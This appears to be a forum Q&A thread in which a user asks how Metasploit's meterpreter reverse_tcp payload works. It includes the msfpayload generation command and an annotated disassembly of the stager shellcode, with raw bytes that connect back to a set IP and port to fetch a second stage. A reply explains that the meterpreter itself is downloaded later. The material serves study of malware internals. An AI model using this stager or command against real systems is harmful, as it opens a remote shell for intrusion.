
I would like to get more in-depth knowledge of how meterpreter works. If you disassemble the payload windows/meterpreter/reverse_tcp, created by msfpayload with the following commands:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary
$ /.../metasploit/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

You'll get the following result:

$ cat asm_code.asm
;-----------------------------------------------------------------------
; Metasploit reverse_tcp stager for 32-bit Windows, as disassembled by
; metasm (Intel syntax; the `; @off  bytes` column is metasm's own).
; Layout: @0..@5 entry, @6..@8eh a hash-based API resolver (the "block_api"
; of the stager source the answer cites), @8fh.. the stager body, which
; calls the resolver through ebp.  Resolver calling convention:
;   caller pushes the API's arguments, then a 32-bit hash, then `call ebp`;
;   the resolver walks the loaded modules and their export tables, finds
;   the export whose ror13 name hash + module-name hash equals the pushed
;   hash, removes the hash from the stack and jumps to that API, which
;   then returns directly to the caller.
; None of this is meterpreter itself; that is fetched over the socket.
;-----------------------------------------------------------------------
entrypoint_0:
; DF=0 so the lodsb loops below advance esi forwards
    cld                                          ; @0  fc  
; the call pushes the address of the next instruction (@6); sub_8fh pops
; it into ebp, so every later `call ebp` re-enters the resolver at @6
    call sub_8fh                                 ; @1  e889000000  x:sub_8fh
; --- API resolver: save all registers, ebp = frame base ---
; after pushad (8 dwords): [ebp+20h] = return address, [ebp+24h] = requested hash
    pushad                                       ; @6  60  
    mov ebp, esp                                 ; @7  89e5  
    xor edx, edx                                 ; @9  31d2  
; edx = fs:[30h]: on 32-bit Windows this is the PEB pointer held in the TEB
    mov edx, fs:[edx+30h]                        ; @0bh  648b5230  r4:segment_base_fs+30h
; edx = PEB->Ldr
    mov edx, [edx+0ch]                           ; @0fh  8b520c  r4:unknown
; edx = first link of the in-memory-order module list (Ldr+14h); the
; offsets used below are relative to that link field inside the loader
; data-table entry, not to the start of the entry
    mov edx, [edx+14h]                           ; @12h  8b5214  r4:unknown


// Xrefs: 8dh
; per-module loop: esi = module name (UTF-16 buffer), ecx = its length
; field in bytes, so every byte -- including the zero high bytes -- is hashed
loc_15h:
    mov esi, [edx+28h]                           ; @15h  8b7228  r4:unknown
    movzx ecx, word ptr [edx+26h]                ; @18h  0fb74a26  r2:unknown
    xor edi, edi                                 ; @1ch  31ff  


// Xrefs: 2ch
; hash the module name: uppercase a-z, then edi = ror(edi, 13) + byte
loc_1eh:
    xor eax, eax                                 ; @1eh  31c0  
    lodsb                                        ; @20h  ac  
    cmp al, 61h                                  ; @21h  3c61  
; signed compare: bytes below 'a' (and bytes >= 80h) are left unchanged
    jl loc_27h                                   ; @23h  7c02  x:loc_27h

    sub al, 20h                                  ; @25h  2c20  


// Xrefs: 23h
loc_27h:
    ror edi, 0dh                                 ; @27h  c1cf0d  
    add edi, eax                                 ; @2ah  01c7  
    loop loc_1eh                                 ; @2ch  e2f0  x:loc_1eh

; save the list link and the module-name hash: [ebp-4] = edx, [ebp-8] = edi
    push edx                                     ; @2eh  52  
    push edi                                     ; @2fh  57  
; edx = module base address (DllBase); walk its PE headers from here
    mov edx, [edx+10h]                           ; @30h  8b5210  r4:unknown
; eax = e_lfanew, then eax = VA of the PE header
    mov eax, [edx+3ch]                           ; @33h  8b423c  
    add eax, edx                                 ; @36h  01d0  
; eax = export directory RVA (DataDirectory[0]); zero => no exports, skip module
    mov eax, [eax+78h]                           ; @38h  8b4078  
    test eax, eax                                ; @3bh  85c0  
    jz loc_89h                                   ; @3dh  744a  x:loc_89h

    add eax, edx                                 ; @3fh  01d0  
; keep the export directory VA on the stack;
; ecx = NumberOfNames, ebx = VA of AddressOfNames
    push eax                                     ; @41h  50  
    mov ecx, [eax+18h]                           ; @42h  8b4818  
    mov ebx, [eax+20h]                           ; @45h  8b5820  
    add ebx, edx                                 ; @48h  01d3  


// Xrefs: 66h
; per-export loop, walking the name table backwards; ecx = names remaining
loc_4ah:
    jecxz loc_88h                                ; @4ah  e33c  x:loc_88h

    dec ecx                                      ; @4ch  49  
; esi = VA of the ecx-th export name string
    mov esi, [ebx+4*ecx]                         ; @4dh  8b348b  
    add esi, edx                                 ; @50h  01d6  
    xor edi, edi                                 ; @52h  31ff  


// Xrefs: 5eh
; hash the export name with the same ror13/add; the NUL terminator is
; folded in as well, because the compare against ah (= 0) comes after the add
loc_54h:
    xor eax, eax                                 ; @54h  31c0  
    lodsb                                        ; @56h  ac  
    ror edi, 0dh                                 ; @57h  c1cf0d  
    add edi, eax                                 ; @5ah  01c7  
    cmp al, ah                                   ; @5ch  38e0  
    jnz loc_54h                                  ; @5eh  75f4  x:loc_54h

; combined hash = export-name hash + module-name hash; compare with the request
    add edi, [ebp-8]                             ; @60h  037df8  
    cmp edi, [ebp+24h]                           ; @63h  3b7d24  
    jnz loc_4ah                                  ; @66h  75e2  x:loc_4ah

; match: eax = export directory VA again; ecx still indexes the name table
    pop eax                                      ; @68h  58  
; ebx = VA of AddressOfNameOrdinals, cx = ordinal of the matched name
    mov ebx, [eax+24h]                           ; @69h  8b5824  
    add ebx, edx                                 ; @6ch  01d3  
    mov cx, [ebx+2*ecx]                          ; @6eh  668b0c4b  
; ebx = VA of AddressOfFunctions, eax = VA of the function itself
    mov ebx, [eax+1ch]                           ; @72h  8b581c  
    add ebx, edx                                 ; @75h  01d3  
    mov eax, [ebx+4*ecx]                         ; @77h  8b048b  
    add eax, edx                                 ; @7ah  01d0  
; store the function VA into the saved-eax slot of the pushad frame
; (esp+0 = saved edi, +4 = saved link, +8.. = the 8 pushad registers, of
; which eax is the highest at +24h), so popad hands it back in eax
    mov [esp+24h], eax                           ; @7ch  89442424  
; discard the saved module hash and list link
    pop ebx                                      ; @80h  5b  
    pop ebx                                      ; @81h  5b  
    popad                                        ; @82h  61  
; drop the hash argument but keep the return address: pop ret, pop hash,
; push ret, then tail-jump into the API; it returns straight to the caller
    pop ecx                                      ; @83h  59  
    pop edx                                      ; @84h  5a  
    push ecx                                     ; @85h  51  
    jmp eax                                      ; @86h  ffe0  


// Xrefs: 4ah
; no export of this module matched: drop the export directory VA
loc_88h:
    pop eax                                      ; @88h  58  


// Xrefs: 3dh
; restore edi/edx and advance to the next module via the list's Flink;
; the list is circular, so an unknown hash makes the resolver loop forever
loc_89h:
    pop edi                                      ; @89h  5f  
    pop edx                                      ; @8ah  5a  
    mov edx, [edx]                               ; @8bh  8b12  r4:unknown
    jmp loc_15h                                  ; @8dh  eb86  x:loc_15h


// Xrefs: 1
; --- stager body ---
sub_8fh:
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
; ebp = the address pushed by the call at @1, i.e. the resolver entry (@6)
    pop ebp                                      ; @8fh  5d  
; build "ws2_32\0\0" on the stack (the immediates are little-endian ASCII:
; 3233h = "32", 5f327377h = "ws2_") and push its address as the argument
    push 3233h                                   ; @90h  6833320000  
    push 5f327377h                               ; @95h  687773325f  
    push esp                                     ; @9ah  54  
; push an API hash and call the resolver; presumably the library-loading
; call that maps ws2_32 -- confirm against the stager source the answer cites
    push 726774ch                                ; @9bh  684c772607  
; metasm marked this call noreturn and stopped disassembling, but the
; resolver's `push ecx; jmp eax` above makes the API return to @0a2h, so
; the bytes below are executed code, not data
    call ebp                                     ; @0a0h  ffd5  endsub sub_8fh noreturn
; Remaining stager bytes, left raw by metasm.  The recurring pattern
; `68 xx xx xx xx ff d5` is push <hash>; call ebp -- one API call each
; through the resolver above.  The connect-back target is visible in clear:
;   @0c4h  68 c0 a8 01 64  push 6401a8c0h  -> 192.168.1.100 (the LHOST given to msfpayload)
;   @0c9h  68 02 00 01 bb  push 0bb010002h -> sin_family 2 (AF_INET), port 01bbh = 443 (LPORT)
; so the IP:port a sample of this stager calls back to can be read straight
; from these bytes.  The trailing c3h at @121h is a `ret`.
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h                                    ; @120h

How can I get a better understanding of what this code means? I would really like to understand how the meterpreter payload works, but unfortunately I don't know where to start.

I started by looking at the code with IDA, but that did not bring me much further.

Any links or resources for reading and further studying are appreciated!

Erik
  • It's hard to tell what's going on without knowing the context in which this code will execute and possibly some intimate details of the application and OS. It appears that there is some online documentation about meterpreter. It may be worthwhile to read it to have the big picture in mind. – Alexey Frunze Feb 27 '12 at 07:51
  • I've already dived into this. Well, what we know is that it should be compiled for Windows x86 – Erik Feb 27 '12 at 08:19



This is really just the stub for the reverse_tcp stager. The source assembly can be found in /opt/metasploit-*/msf3/external/source/shellcode/windows/stager_reverse_tcp.asm (or on github). The meterpreter code itself is not in the payload generated by msfpayload, since it is downloaded ('staged') by the reverse_tcp stager (or whatever other stager you choose to use). The meterpreter source is mostly C, not assembly, since it doesn't have to be shellcode.

bonsaiviking